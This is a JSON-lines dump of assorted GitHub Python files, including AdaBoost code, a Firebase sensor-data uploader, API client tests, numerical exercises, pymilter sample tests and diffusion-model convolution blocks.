count_x0_y0 += 1\n elif(y[row] == unique_values_y[1]):\n count_x0_y1 += 1\n elif(temp[row] == 1):\n if(y[row] == unique_values_y[0]):\n count_x1_y0 += 1\n elif(y[row] == unique_values_y[1]):\n count_x1_y1 += 1\n\n prob_xj_0 = count_for_each_col[0] / self.num_examples\n prob_xj_1 = count_for_each_col[1] / self.num_examples\n\n prob_x1_y1 = count_x1_y1 / count_for_each_col[1]\n prob_x1_y0 = count_x1_y0 / count_for_each_col[1]\n\n if(count_for_each_col[0] == 0):\n prob_x0_y0 = 0\n prob_x0_y1 = 0\n else:\n prob_x0_y1 = count_x0_y1 / count_for_each_col[0]\n prob_x0_y0 = count_x0_y0 / count_for_each_col[0]\n\n # calculate H(Y/X) for the given feature\n entropy_yx = self.calculate_conditional_entropy(\n prob_x1_y1, prob_x1_y0, prob_x0_y1, prob_x0_y0, prob_xj_0, prob_xj_1)\n ig[feature] = entropy_yx\n\n self.indices = (ig.argsort()[:self.number_of_features_to_select])\n new_X = X[:, self.indices]\n # print(self.indices)\n return new_X\n\n# TODO: Add other Models as necessary.\n\n\nclass AdaBoost(Model):\n\n def __init__(self, iterations):\n super().__init__()\n self.iterations = iterations\n self.num_input_features = None\n self.h_t = []\n\n def fit(self, X, y):\n X = X.toarray()\n self.num_examples, self.num_input_features = X.shape\n y[y <= 0] = -1\n\n # Initialize c_array\n c_array=self.compute_c_values(X, y)\n # Initialize D\n D = np.ones(self.num_examples, dtype=np.float) / self.num_examples\n\n for t in range(self.iterations):\n h_tuple = self.compute_H_values(D, X, y,c_array)\n weight = h_tuple[3]\n if (weight < 0.000001):\n break\n\n c,j,ht,_, pred_vals= h_tuple\n\n x = X[:, j]\n alpha = (math.log((1 - weight) / weight)) / 2\n D = np.multiply(D, (np.exp(-alpha * np.multiply(y, pred_vals))))\n D = D / float(D.sum())\n self.h_t.append([c, j, ht, alpha])\n\n def compute_c_values(self, X, y):\n c_array = np.empty(\n (self.num_examples - 1, self.num_input_features), dtype=np.float)\n for j in range(self.num_input_features):\n x = sorted(X[:, j])\n for k in 
range(self.num_examples - 1):\n c_array[k, j] = (x[k + 1] + x[k]) / 2\n return c_array\n\n def compute_H_values(self, D, X, y, c_array):\n currError = np.inf\n best_direction = ()\n h_value=()\n for j in range(self.num_input_features):\n for k in range( self.num_examples - 1):\n c = c_array[k, j]\n if c == 0.:\n continue\n for t in range(0, 2):\n yhat_curr = np.ones(self.num_examples, dtype=np.int)\n error_Array = np.ones(self.num_examples, dtype=np.float)\n feature_array = X[:, j]\n direction = (0, 0)\n if (t == 0):\n yhat_curr[feature_array > c] = -1\n direction = (-1, 1)\n elif (t == 1):\n yhat_curr[feature_array <= c] = -1\n direction = (1, -1)\n\n error_Array[yhat_curr == y] = 0\n weight = np.dot(error_Array, D)\n\n if (weight < currError):\n currError = weight\n best_direction = direction\n h_value = (c, j, direction, currError, yhat_curr)\n return h_value\n\n def predict(self, X):\n if self.h_t is [None]:\n raise Exception('fit must be called before predict.')\n\n num_examples, num_input_features = X.shape\n\n if num_input_features < self.num_input_features:\n # X = X.copy()\n X._shape = (num_examples, self.num_input_features)\n # Or perhaps more features are seen at test time, in which case we will\n # simply ignore them.\n if num_input_features > self.num_input_features:\n X = X[:, :self.num_input_features]\n X = X.toarray()\n\n weighted_sum = np.zeros(num_examples)\n yhat = np.empty(num_examples, dtype=np.int)\n\n for h in self.h_t:\n c,j,direction,alpha = h\n x = X[:, j]\n yhat = np.ones((num_examples), dtype=np.int)\n yhat[x > c] = direction[0]\n yhat[x <= c] = direction[1]\n\n weighted_sum = weighted_sum + (alpha * yhat)\n\n yhat = np.sign(weighted_sum)\n yhat[yhat < 0] = 0\n\n return yhat\n","repo_name":"geetsawhney/logistic-regression","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} 
+{"seq_id":"5820740801","text":"# Required\nmetadata = Hash()\n\n@construct\ndef seed():\n #Define metadata values\n metadata['key1'] = 'some value'\n metadata['key2'] = 'some value'\n metadata['key3'] = 'some value'\n\n # Optional: needed if metadata values are intended to be mutable\n metadata['operator'] = ctx.caller # sets operator to the submitter of the contract \n\n# Optional: needed if metadata values are intended to be mutable\n@export\ndef change_meta(key: str, value: Any):\n assert ctx.caller == metadata['operator'], 'Only operator can set metadata!'\n metadata[key] = value","repo_name":"Lamden-Standards/LST002","sub_path":"meta-contract.py","file_name":"meta-contract.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"3701730866","text":"\"\"\"\n 1 文件输入输出(NLP练习)\n 2 JSON 序列化实战练习\n dump:将Python对象按照JSON格式序列化到文件中\n dumps:将Python对象处理成JSON格式的字符串\n load:将文件中的JSON数据反序列化成对象\n loads:将字符串中的内容反序列化成Python对象\n\"\"\"\nimport re\nimport json\n\n\ndef parse(text):\n # 使用正则表达式去除标点符号和换行符\n text = re.sub(r'[^\\w]', ' ', text)\n # 小写\n text = text.lower()\n # 生成所有单词的列表\n words_list = text.split(' ')\n # 去除空白单词\n words_cnt = {}\n for word in words_list:\n if word not in words_cnt:\n words_cnt[word] = 0\n words_cnt[word] += 1\n # 按照词频排序\n sorted_words_cnt = sorted(words_cnt.items(), key=lambda kv: kv[1], reverse=True)\n\n return sorted_words_cnt\n\n\ndef json_pra():\n params = {'symbol': '12345', 'type': 'limit', 'price': 123.4, 'amount': 23}\n params_str = json.dumps(params)\n\n print('after json serialization……')\n print(f'type of params_str = {type(params_str)}, params_str = {params_str}')\n\n original_params = json.loads(params_str)\n\n print('after json deserialization……')\n print(f'type of original_params = {type(original_params)}, original_params = {original_params}')\n\n\nif __name__ == \"__main__\":\n try:\n with open('in.txt', 'r')as f_in:\n txt = f_in.read()\n 
word_and_freq = parse(txt)\n\n with open('out.txt', 'w')as f_out:\n for words, freq in word_and_freq:\n f_out.write(f'{words} {freq}\\n')\n except IOError as e:\n print(e)\n except Exception as oe:\n print(oe)\n json_pra()\n","repo_name":"xxwqlee/pylearn","sub_path":"GeekTime/fio.py","file_name":"fio.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"48630093","text":"from datetime import datetime\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nimport time\nfrom random import random\nTEMPERATURE_STRING = \"temperature\"\nHUMIDITY_STRING = \"humidity\"\nMOISTURE_STRING = \"moisture\"\ntdiff=0\n# tdiff=1582731453-time.time()\n\ndef update(name, value):\n print(name + \" \" + str(value))\n ref.child(\"realtime\").update({name: value})\n ref.child(name).update({str(round(time.time()+tdiff)): value})\n\ndef updateWithTime(name, value, time):\n print(name+\" \"+str(value)+\" \"+str(time))\n ref.child(\"realtime\").update({name: value})\n ref.child(name).update({str(time): value})\n\ndef uploadRandomFor2Days():\n last_temp = 15\n last_hum = 30\n last_moi = 30\n j = round(time.time())\n\n i = 0\n while i < 172800:\n t = j - i\n print(t)\n i = i + 600\n last_temp = last_temp + round(random() * 10 - 5)\n last_hum = last_hum + round(random() * 20 - 10)\n last_moi = last_moi + round(random() * 50 - 25)\n if last_temp < 0:\n last_temp = 1\n if last_temp > 30:\n last_temp = 28\n if last_hum < 0:\n last_hum = 3\n if last_hum > 95:\n last_hum = 90\n if last_moi < 0:\n last_moi = 3\n if last_moi > 800:\n last_moi = 760\n updateWithTime(TEMPERATURE_STRING, last_temp, t)\n updateWithTime(HUMIDITY_STRING, last_hum, t)\n updateWithTime(MOISTURE_STRING, last_moi, t)\n updateWithTime('light', last_moi, t)\n\ndef uploadEvery5Seconds(s):\n last_temp = 15\n last_hum = 30\n last_moi = 30\n last_light = 100\n\n for i in range(s):\n last_temp = 
last_temp + round(random() * 5 - 2.5)\n last_hum = last_hum + round(random() * 20 - 10)\n last_moi = last_moi + round(random() * 80 - 40)\n last_light = last_light + round(random() * 100 - 50)\n if last_temp < 0:\n last_temp = 1\n if last_temp > 30:\n last_temp = 28\n\n if last_hum < 0:\n last_hum = 3\n if last_hum > 95:\n last_hum = 90\n\n if last_moi < 0:\n last_moi = 3\n if last_moi > 800:\n last_moi = 760\n\n if last_light < 0:\n last_light = 5\n if last_light > 800:\n last_light = 760\n update(TEMPERATURE_STRING, last_temp)\n update(HUMIDITY_STRING, last_hum)\n update(MOISTURE_STRING, last_moi)\n update(\"light\", last_light)\n time.sleep(2)\n\n\ncred = credentials.Certificate('serviceAccountKey.json')\nfirebase_admin.initialize_app(cred, {'databaseURL': 'https://solarbabesdb.firebaseio.com/'})\nplantName = \"0002\"\nref = db.reference('heliopots/'+plantName+'/data')\n#\n# update(HUMIDITY_STRING, 12)\n# uploadEvery5Seconds(100000000)\nuploadRandomFor2Days()\n","repo_name":"SolarBabes/HelioPotRobot","sub_path":"other/manualUpdateFirebase.py","file_name":"manualUpdateFirebase.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6222056427","text":"import json\n\nimport pytest\nfrom common.api.base import DataAPI, DataDRFAPISet, DRFActionAPI\nfrom common.api.modules.bklogin import BkLoginApi\nfrom common.api.modules.cmsi import CmsiApi\nfrom common.exceptions import ApiRequestError\n\nDEMO_URL = \"http://demo.com/\"\n\n\nclass _StreamApi:\n def __init__(self):\n self.jobs = DataDRFAPISet(\n url=DEMO_URL + \"jobs/\",\n module=\"stream.job\",\n primary_key=\"job_id\",\n description=\"流程任务资源操作集合\",\n default_return_value=(lambda: {\"result\": True, \"data\": \"ok\"}),\n custom_config={\n \"start\": DRFActionAPI(detail=True, method=\"post\"),\n \"top\": DRFActionAPI(detail=False, method=\"get\"),\n },\n )\n self.simple = DataAPI(url=DEMO_URL + \"simple\", 
method=\"get\", module=\"stream.simple\", description=\"简单接口\")\n self.fail = DataAPI(url=DEMO_URL + \"fail\", method=\"get\", module=\"stream.fail\", description=\"异常接口\")\n\n\nstreamapi = _StreamApi()\n\n\nclass TestStreamApi:\n def test_simple(self, requests_mock):\n requests_mock.get(f\"{DEMO_URL}simple\", complete_qs=False, text=json.dumps({\"result\": True, \"data\": \"OK\"}))\n assert streamapi.simple({}).data == \"OK\"\n\n requests_mock.get(f\"{DEMO_URL}fail\", complete_qs=False, text=\"Bad Gateway\", status_code=\"502\")\n with pytest.raises(ApiRequestError):\n streamapi.fail({})\n\n def test_list(self):\n api = streamapi.jobs.list\n assert api.url == \"http://demo.com/jobs/\"\n assert api.method == \"get\"\n\n def test_create(self):\n api = streamapi.jobs.create\n assert api.url == \"http://demo.com/jobs/\"\n assert api.method == \"post\"\n\n def test_update(self):\n api = streamapi.jobs.update\n assert api.url == \"http://demo.com/jobs/{job_id}/\"\n assert api.method == \"put\"\n\n def test_partial_update(self):\n api = streamapi.jobs.partial_update\n assert api.url == \"http://demo.com/jobs/{job_id}/\"\n assert api.method == \"patch\"\n\n def test_delete(self):\n api = streamapi.jobs.delete\n assert api.url == \"http://demo.com/jobs/{job_id}/\"\n assert api.method == \"delete\"\n\n def test_retrieve(self):\n api = streamapi.jobs.retrieve\n assert api.url == \"http://demo.com/jobs/{job_id}/\"\n assert api.method == \"get\"\n\n def test_start(self):\n api = streamapi.jobs.start\n assert api.url == \"http://demo.com/jobs/{job_id}/start/\"\n assert api.method == \"post\"\n\n def test_top(self):\n api = streamapi.jobs.top\n assert api.url == \"http://demo.com/jobs/top/\"\n assert api.method == \"get\"\n\n\nclass TestModuleAPI:\n def test_cmsi(self, requests_mock):\n requests_mock.post(\n \"/api/c/compapi/v2/cmsi/send_rtx/\",\n complete_qs=False,\n text=json.dumps({\"result\": True, \"message\": \"企业微信消息发送成功\"}),\n )\n response = 
CmsiApi.send_eewechat({\"receivers\": [\"user01\", \"user02\"], \"message\": \"WTF, fighting....\"})\n assert response.message == \"企业微信消息发送成功\"\n\n def test_bklogin(self):\n response = BkLoginApi.get_user_info({\"bk_username\": \"admin\"})\n assert response.is_success()\n assert response.data == {}\n","repo_name":"Tencent/bk-base","sub_path":"src/api/upizza/tests/test_common_api.py","file_name":"test_common_api.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"18"} +{"seq_id":"9758470304","text":"import sys\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nisoterma = []\ninterna = []\nexterna = []\ndataFile = open(sys.argv[1], 'r')\n\nradio_interno = int(sys.argv[2])\nradio_externo = int(sys.argv[3])\n\nnum_angulos = 0\nfor line in dataFile:\n\tdata = line.split()\n\tisoterma.append(float(data[0]))\n\tinterna.append(radio_interno)\n\texterna.append(radio_externo)\n\tnum_angulos = num_angulos + 1\n\nisoterma.append(isoterma[0])\ninterna.append(radio_interno)\nexterna.append(radio_externo)\n\ndelta_angulo = 2 * np.pi / num_angulos\nangulos = np.arange(0, 2 * np.pi, delta_angulo).tolist()\nangulos.append(0)\n\n# index = 0\n# for line in isoterma:\n\t# print math.degrees(angulos[index]), isoterma[index]\n\t# index = index + 1\n\n# print isoterma\n# print num_angulos\n# print delta_angulo\n# print angulos\n\nax = plt.subplot(111, polar=True, axisbg=(0.9, 0.9, 0.9))\nax.plot(angulos, interna, color='b', linewidth=4)\nax.plot(angulos, isoterma, color='r', linewidth=1)\nax.plot(angulos, externa, color='g', linewidth=3)\nax.set_yticks(range(0, int(1.5 * radio_externo), 100))\nax.grid(True)\n\nax.set_title(\"Ubicacion de la isoterma\", va='bottom')\nplt.savefig(sys.argv[1] + 
\".png\")\nplt.close()\n","repo_name":"svilerino/metnum","sub_path":"tp1/src/tools/plotter_isoterma.py","file_name":"plotter_isoterma.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26673400130","text":"class Device(object):\n def __init__(self, data):\n self.m_data = data\n self.m_clientVersion = data[\"clientVersion\"]\n self.m_deviceName = data[\"device\"]\n self.m_deviceId = data[\"deviceId\"]\n self.m_pushToken = data[\"pushToken\"]\n self.m_platform = data[\"platform\"]\n self.m_language = data[\"language\"]\n self.m_timezone = data[\"timezone\"]\n\n def __repr__(self) -> str:\n return f\"\"","repo_name":"torresflo/PyReal","sub_path":"API/Model/Device.py","file_name":"Device.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"30752873900","text":"#!/usr/bin/env python3\n\nfrom distutils.core import setup, Extension\nimport os\nimport os.path\nimport re\n\nuse_cython = 1\nif use_cython:\n from Cython.Distutils import build_ext\n ext_modules = [Extension(\"primitives\",\n [\"src/gensokyo/cython/primitives.pyx\"])]\nelse:\n class build_ext: pass\n ext_modules = [Extension(\"primitives\",\n [\"src/gensokyo/cython/primitives.c\"])]\n\n\ndef get_resources(dir):\n l = []\n rget_resources(dir, l)\n return l\n\ndef make_listing(dir):\n return (dir, [os.path.join(dir, x) for x in os.listdir(dir) if\n os.path.isfile(os.path.join(dir, x))])\n\ndef rget_resources(dir, l):\n l.append(make_listing(dir))\n for d in os.listdir(dir):\n if os.path.isdir(os.path.join(dir, d)):\n rget_resources(os.path.join(dir, d), l)\n\np_py = re.compile(r'(.+)\\.py')\ndef get_modules(dir):\n return [p_py.match(x).group(1) for x in os.listdir(dir) if p_py.match(x)]\n\ndef get_packages(dir):\n l = []\n rget_packages(dir, '', l)\n return l\n\ndef rget_packages(start, dir, l):\n ls = 
os.listdir(os.path.join(start, dir))\n if '__init__.py' in ls:\n l.append(dir.replace('/', '.'))\n for x in [x for x in ls if os.path.isdir(os.path.join(start, dir, x))]:\n rget_packages(start, os.path.join(dir, x), l)\n\nsetup(\n name = 'TouhouS',\n version='1.0',\n description='TouhouS game',\n author='Allen Li',\n author_email='darkfeline@abagofapples.com',\n package_dir={'':'src'},\n py_modules=get_modules('src'),\n packages=get_packages('src'),\n cmdclass = {'build_ext': build_ext},\n ext_package = 'gensokyo',\n ext_modules = ext_modules,\n scripts=['src/touhouS.py', 'bin/profile.py'],\n data_files=get_resources('resources')\n)\n","repo_name":"darkfeline/TouhouS","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75052450279","text":"from __future__ import print_function\nfrom fractions import Fraction\nimport numpy as np\nimport sympy as sp\n\nn = input(\"Enter the number of equations in the system : \")\nA = [[0 for j in range(4)] for i in range(n)]\ny = [0 for j in range(n)]\n\ndef main():\n\tfor i in range (n):\n\t\tprint(\"Equation number \" + str(i+1) + \" : \")\n\t\ttemp = raw_input()\n\t\ttemp = temp.split(\" \")\n\t\tfor j in range(4):\n\t\t\tA[i][j] = Fraction(temp[j])\n\tcalc_y(n)\n\ndef print_aug():\n\tfor i in range(n):\n\t\tfor j in range(4):\n\t\t\tprint (\"%10.5f\" %float(A[i][j]), end = \" \")\n\t\t\t# print(float(A[i][j]), end = \" \")\n\t\tprint()\n\tprint()\n\ndef print_ans():\n\tfor i in range(n):\n\t\tprint (\"y\" + str(i+1) + \" : \" + str(float(y[i])))\n\ndef calc_y(t):\n\tprint_aug()\n\tfor i in range(1,t):\n\t\tmf = Fraction(A[i][0]/A[i-1][1]) \n\t\tA[i][0] -= Fraction((mf)*A[i-1][1])\n\t\tA[i][1] -= Fraction((mf)*A[i-1][2])\n\t\tA[i][3] -= Fraction((mf)*A[i-1][3])\n\tprint(\"Augmented matrix after thomas's algo : \")\n\tprint_aug()\n\n\ty[t-1] = Fraction((A[t-1][3]/A[t-1][1]))\n\n\tfor j in 
range(t-2,-1,-1):\n\t\ty[j] = Fraction((A[j][3] - A[j][2] * y[j+1])/A[j][1])\n\n\tprint_ans()\n\nmain()","repo_name":"divyanshu-talwar/Numerical-Methods","sub_path":"Assignment3/question3/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"15372142633","text":"\nclass LinkList(object):\n def __init__(self, data=0, next=None):\n self.data = data\n self.next = next\n\n def __repr__(self):\n return str(self.data) + \" \" + str(self.next)\n\nclass BSTNode(object):\n def __init__(self, data=0, left=None, right=None):\n self.data = data\n self.left, self.right = left, right\n\n def __repr__(self):\n return str(self.data) + \" \" + str(self.left) + \" \" + str(self.right)\n\ndef form_node(L):\n s = LinkList(0, L)\n f = L\n while f and f.next:\n s, f = s.next, f.next.next\n node = s.next\n s.next = None\n # Consider the case when there is only one node in the list.\n return (L if L != node else None, node.data, node.next)\n\ndef build_bst_from_sorteed_list(L):\n if not L:\n return None\n left_bst_list, node_data, right_bst_list = form_node(L)\n return BSTNode( node_data,\n build_bst_from_sorteed_list(left_bst_list),\n build_bst_from_sorteed_list(right_bst_list))\n\nif __name__ == \"__main__\":\n L = LinkList(1, LinkList(2, LinkList(3, LinkList(4))))\n print (L)\n tree = build_bst_from_sorteed_list(L)\n print (tree)\n","repo_name":"litakgit/DSAlgo","sub_path":"IC_Problems/86_sorted_list_to_bst.py","file_name":"86_sorted_list_to_bst.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23472752142","text":"import sys\n\ninput = sys.stdin.readline\n\nN = int(input())\nheights = [int(input()) for _ in range(N)]\n\ncount = 0\nstack = []\n\nfor height in heights:\n nowcount = 1\n while stack:\n if height >= stack[-1][0]:\n count += 
stack[-1][1]\n\n if height == stack[-1][0]:\n nowcount += stack[-1][1]\n\n stack.pop()\n\n else:\n count += 1\n break\n\n stack.append((height, nowcount))\n\nprint(count)","repo_name":"StepByStep-Algorithm/2021Fall","sub_path":"WEEK1-A/leehe228/boj3015.py","file_name":"boj3015.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75294847079","text":"import unittest\nimport Milter\nimport sample\nimport mime\nimport rfc822\nimport StringIO\nfrom Milter.test import TestBase\n\nclass TestMilter(TestBase,sample.sampleMilter):\n def __init__(self):\n TestBase.__init__(self)\n sample.sampleMilter.__init__(self)\n\nclass BMSMilterTestCase(unittest.TestCase):\n\n def testDefang(self,fname='virus1'):\n milter = TestMilter()\n rc = milter.connect()\n self.failUnless(rc == Milter.CONTINUE)\n rc = milter.feedMsg(fname)\n self.failUnless(rc == Milter.ACCEPT)\n self.failUnless(milter._bodyreplaced,\"Message body not replaced\")\n fp = milter._body\n open('test/'+fname+\".tstout\",\"w\").write(fp.getvalue())\n #self.failUnless(fp.getvalue() == open(\"test/virus1.out\",\"r\").read())\n fp.seek(0)\n msg = mime.message_from_file(fp)\n s = msg.get_payload(1).get_payload()\n milter.log(s)\n milter.close()\n\n def testParse(self,fname='spam7'):\n milter = TestMilter()\n milter.connect('somehost')\n rc = milter.feedMsg(fname)\n self.failUnless(rc == Milter.ACCEPT)\n self.failIf(milter._bodyreplaced,\"Milter needlessly replaced body.\")\n fp = milter._body\n open('test/'+fname+\".tstout\",\"w\").write(fp.getvalue())\n milter.close()\n\n def testDefang2(self):\n milter = TestMilter()\n milter.connect('somehost')\n rc = milter.feedMsg('samp1')\n self.failUnless(rc == Milter.ACCEPT)\n self.failIf(milter._bodyreplaced,\"Milter needlessly replaced body.\")\n rc = milter.feedMsg(\"virus3\")\n self.failUnless(rc == Milter.ACCEPT)\n self.failUnless(milter._bodyreplaced,\"Message body not 
replaced\")\n fp = milter._body\n open(\"test/virus3.tstout\",\"w\").write(fp.getvalue())\n #self.failUnless(fp.getvalue() == open(\"test/virus3.out\",\"r\").read())\n rc = milter.feedMsg(\"virus6\")\n self.failUnless(rc == Milter.ACCEPT)\n self.failUnless(milter._bodyreplaced,\"Message body not replaced\")\n self.failUnless(milter._headerschanged,\"Message headers not adjusted\")\n fp = milter._body\n open(\"test/virus6.tstout\",\"w\").write(fp.getvalue())\n milter.close()\n\ndef suite(): return unittest.makeSuite(BMSMilterTestCase,'test')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jmehnle/pymilter","sub_path":"testsample.py","file_name":"testsample.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"16324198100","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n#from einops import rearrange, reduce\n#from einops.layers.torch import Rearrange\n\nfrom src.models.helpers import *\n\n# -------------------------------------------------- Weighted conv ------------------------------------------------\nclass WeightStandardizedConv2d(nn.Conv2d):\n \"\"\"\n https://arxiv.org/abs/1903.10520\n weight standardization purportedly works synergistically with group normalization\n \n SF: do not use einops\n Adopted from https://huggingface.co/blog/annotated-diffusion\n \"\"\"\n def forward(self, x):\n eps = 1e-5 if x.dtype == torch.float32 else 1e-4\n\n weight = self.weight\n mean = torch.mean(weight, dim = [1, 2, 3], keepdim = True) \n var = torch.var(weight, unbiased = False, dim = [1, 2, 3], keepdim = True)\n normalized_weight = (weight - mean) * (var + eps).rsqrt()\n\n return F.conv2d(\n x,\n normalized_weight,\n self.bias,\n self.stride,\n self.padding,\n self.dilation,\n self.groups,\n )\n\n## --------------------------------------------------- ConvBlock --------------------------------------------------\nclass 
conv_block(nn.Module):\n \"\"\" Adopted from: https://huggingface.co/blog/annotated-diffusion \"\"\"\n def __init__(self, dim, dim_out, groups=8):\n super().__init__()\n self.proj = WeightStandardizedConv2d(dim, dim_out, 3, padding=1)\n self.norm = nn.GroupNorm(groups, dim_out)\n self.act = nn.SiLU()\n\n def forward(self, x, scale_shift=None):\n x = self.proj(x)\n x = self.norm(x)\n\n if exists(scale_shift):\n scale, shift = scale_shift\n x = x * (scale + 1) + shift\n\n x = self.act(x)\n return x\n\n# -------------------------------------------------- ResNet block -------------------------------------------------\nclass ResnetBlock(nn.Module):\n \"\"\"\n https://arxiv.org/abs/1512.03385\n Adopted from: https://huggingface.co/blog/annotated-diffusion\n \"\"\"\n\n def __init__(self, in_channels, out_channels, \n res_hidden=None,\n time_emb_dim=None, groups=8):\n super().__init__()\n \n self.mlp = None\n if exists(time_emb_dim):\n self.mlp = nn.Sequential(nn.SiLU(), \n nn.Linear(time_emb_dim, out_channels * 2)\n )\n\n if not res_hidden:\n res_hidden = out_channels\n \n self.block1 = conv_block(in_channels, res_hidden, groups=groups)\n self.block2 = conv_block(res_hidden, out_channels, groups=groups)\n \n if in_channels != out_channels:\n self.res_conv = nn.Conv2d(in_channels, out_channels, 1)\n else:\n self.res_conv = nn.Identity()\n\n def forward(self, x, time_emb = None):\n scale_shift = None\n if exists(self.mlp) and exists(time_emb):\n time_emb = self.mlp(time_emb)\n #time_emb = rearrange(time_emb, \"b c -> b c 1 1\")\n time_emb = time_emb.view(time_emb.shape[0], time_emb.shape[1], 1, 1)\n scale_shift = time_emb.chunk(2, dim=1)\n\n h = self.block1(x, scale_shift=scale_shift)\n h = self.block2(h)\n return h + self.res_conv(x)\n\n# --------------------------------------------------- Upsampling --------------------------------------------------\ndef Upsample(dim, dim_out = None, conv = 'bilinear', scale = 2):\n \"\"\"\n Upsampling the input data. 
For possible compatibility with some of my old code\n I leave option to use ConvTransposed2D\n \"\"\"\n if 'conv' in conv:\n return UpsampleConv(dim, dim_out)\n elif conv in ['nearest', 'linear', 'bilinear', 'bicubic', 'trilinear']:\n return UpsampleInterp(dim, dim_out, conv, scale)\n else:\n raise ValueError(f\"Expected conv ot be 'conv', 'nearest', 'linear', 'bilinear', 'bicubic', 'trilinear', got '{conv}'\")\n \n \ndef UpsampleInterp(dim, dim_out = None, interp = 'linear', scale = 2, def_align_corners = False):\n assert scale is not None and scale != 0, f'Scale must be specified!'\n if not dim_out:\n dim_out = dim\n if interp in ['linear', 'bilinear', 'bicubic', 'trilinear']:\n align_corners = def_align_corners # check if helps against checkerboard pattern, was: True\n else:\n align_corners = None\n #align_corners = None # check if helps against checkerboard pattern\n return nn.Sequential(\n nn.Upsample(scale_factor=scale, mode=interp, align_corners=align_corners),\n nn.Conv2d(in_channels=dim,\n out_channels=dim_out, \n kernel_size=3, \n padding=1),\n nn.GroupNorm(max(1, dim_out//4), dim_out)\n )\n\n\ndef UpsampleConv(dim, dim_out=None):\n convT_kernel = 4\n convT_stride = 2\n convT_padding = 1\n if not dim_out:\n dim_out = dim\n return nn.Sequential(\n nn.ConvTranspose2d(in_channels=dim,\n out_channels=dim_out,\n kernel_size=convT_kernel, \n stride=convT_stride, \n padding=convT_padding),\n nn.GroupNorm(max(1, dim_out//4), dim_out)\n )\n\n# -------------------------------------------------- Downsampling -------------------------------------------------\ndef Downsample(dim, dim_out = None, mode = 'avg', kern = 2):\n \"\"\" Downsampling. 
Left strided conv2d for legacy \"\"\"\n if 'conv' in mode:\n return DownsampleConv(dim, dim_out)\n else:\n assert kern is not None and kern != 0, f'Kernel size must be specified!'\n return DownsamplePool(dim, dim_out, mode, kern)\n\n\ndef DownsamplePool(dim, dim_out=None, mode = 'avg', kern = 2):\n if 'avg' in mode or 'mean' in mode:\n pooling = nn.AvgPool2d(kernel_size = kern)\n elif 'max' in mode:\n pooling = nn.MaxPool2d(kernel_size=kern)\n else:\n raise ValueError(f\"Expected mode to be 'avg'/'mean' or 'max', got {mode} instead\")\n if not dim_out:\n dim_out = dim\n return nn.Sequential(\n pooling, \n nn.Conv2d(in_channels=dim,\n out_channels=dim_out, \n kernel_size=3, \n padding=1),\n nn.GroupNorm(max(1, dim_out//4), dim_out)\n )\n\n\ndef DownsampleConv(dim, dim_out=None):\n conv_kernel = 3\n stride = 2\n padding = 1\n if not dim_out:\n dim_out = dim\n return nn.Sequential(\n nn.Conv2d(in_channels=dim, \n out_channels=dim_out,\n kernel_size=conv_kernel,\n stride=stride, padding=padding),\n nn.GroupNorm(max(1, dim_out//4), dim_out))","repo_name":"stanipov/pytorch-diffusion","sub_path":"src/models/conv_blocks.py","file_name":"conv_blocks.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20688389539","text":"from mpt.models import db\nfrom mpt.models.base_model import base_model\nfrom mpt.models.project import project_assignment\nfrom sqlalchemy import Column, String, Integer, Text\n\n\nclass User(base_model):\n __tablename__ = \"users\"\n\n first_name = Column(String(50), nullable=False)\n last_name = Column(String(50), nullable=False)\n position = Column(String(15), nullable=False)\n tasks = db.relationship(\n \"Task\",\n cascade=\"all, delete-orphan\",\n lazy=True\n )\n projects = db.relationship(\n \"Project\",\n secondary=project_assignment,\n lazy=True\n )\n\n def __repr__(self):\n return 
f''\n","repo_name":"morsemars/morse-project-tracker","sub_path":"mpt/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73858725799","text":"# coding: UTF-8\nimport os\nimport time\nimport glob\nimport torch\nimport numpy as np\nfrom importlib import import_module\nimport argparse\nfrom tools.common import seed_everything, init_logger, logger\nfrom processors import glue_output_modes as output_modes\nfrom processors import glue_processors as processors\nfrom pytorch_pretrained.file_utils import WEIGHTS_NAME\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Chinese Text Classification')\n parser.add_argument(\"--data_dir\", default=None, type=str, required=True,\n help=\"The input data dir. Should contain the .tsv files (or other data files) for the task.\")\n parser.add_argument('--model_type', type=str, required=True,\n help='choose a model: TextCNN, TextRNN, FastText, TextRCNN, TextRNN_Att, 